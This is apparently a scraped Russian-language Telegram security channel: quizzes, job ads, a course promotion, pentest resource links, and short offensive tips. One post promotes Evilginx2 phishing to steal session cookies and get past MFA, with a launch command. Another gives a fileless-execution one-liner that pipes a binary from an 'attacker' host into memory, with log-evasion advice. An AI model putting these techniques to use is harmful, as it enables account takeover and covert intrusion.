Какой HTTP-код придумали шутки ради, а потом он стал мемом ❓
Anonymous Quiz
26%
451
14%
499
21%
418
38%
999
💯5😁1
Evilginx2 — это фреймворк для phishing-атаки без паролей, главная фишка которого в том, что он перехватывает cookies сессии и токены MFA.
Чем полезен:
— Обход классических 2FA/SMS/MFA
— Реалистичные фишинговые страницы (копируются вживую)
— Поддержка кастомных фишинговых шаблонов
— Логи сессий с захваченными cookies и токенами
Пример запуска:
evilginx -p ./phishlets/microsoft.yaml
После запуска жертва открывает фишинговый домен, проходит логин, а атакующий получает рабочие cookies.
#буст
Please open Telegram to view this post
VIEW IN TELEGRAM
👍5👏1
Мессенджер Max активно продвигают как «новинку», но под капотом он оказался куда более знакомым.
В карточках — что внутри Max, на чём он работает и как обстоят дела с безопасностью
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🌚8❤2
Please open Telegram to view this post
VIEW IN TELEGRAM
😁7🌚1
Не базовые ls и cd, а готовые мини-скрипты: перенос директорий, умное переименование файлов, калькулятор, расширенный пинг и даже предсказания с cowsay.
#буст
Please open Telegram to view this post
VIEW IN TELEGRAM
❤5😁3🔥1
Если хотите выйти за рамки базового пентеста и реально прокачать навыки, эти темы и ресурсы точно стоит изучить:
Обширный вики-справочник по пентесту и CTF: от эксплуатации уязвимостей до обхода защит. Отлично структурирован и регулярно обновляется сообществом.
Каталог Unix-бинарников, которые можно использовать для обхода локальных ограничений и эскалации привилегий. Полезен при работе с ограниченными шеллами.
Коллекция полезных пэйлоадов и техник обхода для тестирования веб-приложений. Подходит для пентестеров и участников CTF.
Ресурс, предлагающий материалы по анализу вредоносного ПО, включая лабораторные задания и руководства.
Образовательная платформа, предлагающая курсы по низкоуровневой безопасности, реверс-инжинирингу и эксплуатации уязвимостей.
#свежак
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥5😢1
Вы тестируете веб-приложение, которое передаёт данные чата через WebSocket. При анализе трафика вы замечаете:
— Подключение идёт по ws:// вместо wss://
— Сообщения передаются в открытом виде (JSON без шифрования)
— В сообщениях содержатся идентификаторы пользователей и текст переписки
Какая уязвимость возникает в такой конфигурации
#междусобойчик
Please open Telegram to view this post
VIEW IN TELEGRAM
🤔3
This media is not supported in your browser
VIEW IN TELEGRAM
👾3
7 октября стартует второй поток курса «AI-агенты для DS-специалистов».
За 5 недель вы научитесь собирать агентов, которые уже сейчас будут помогать бизнесу.
В кружке выше Максим Шаланкин, наш преподаватель, рассказывает подробнее — включай, чтобы не пропустить.
Please open Telegram to view this post
VIEW IN TELEGRAM
Специалист по информационной безопасности — 230 000 ₽, офис (Москва)
Инженер ИБ сервисов — удаленно/гибрид (Москва)
Pentester — от 380 000 ₽, удаленно (Москва)
Information Security Specialist (DLP) — от 120 000 ₽, офис (Москва)
Специалист ИБ — от 200 000 до 300 000 ₽, офис (Моска)
#свежак
Please open Telegram to view this post
VIEW IN TELEGRAM
😁3🔥1
Если нельзя писать на диск или не хочется светиться в логах — можно выполнить ELF-бинарник напрямую из памяти, минуя файловую систему:
curl https://attacker/payload.elf | bash -c 'chmod +x /dev/fd/0 && /dev/fd/0'
Как работает:
— curl тянет бинарь по HTTP
— /dev/fd/0 — спецфайл, указывающий на поток stdin
— chmod +x делает поток исполняемым
— /dev/fd/0 сразу запускается как исполняемый ELF
Полезно для:
— Заменить curl на wget -qO-, socat, nc, httpie
— Альтернатива: /proc/self/fd/0
— Можно обфусцировать URL, использовать TLS и подмену юзер-агента
#буст
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥6👍1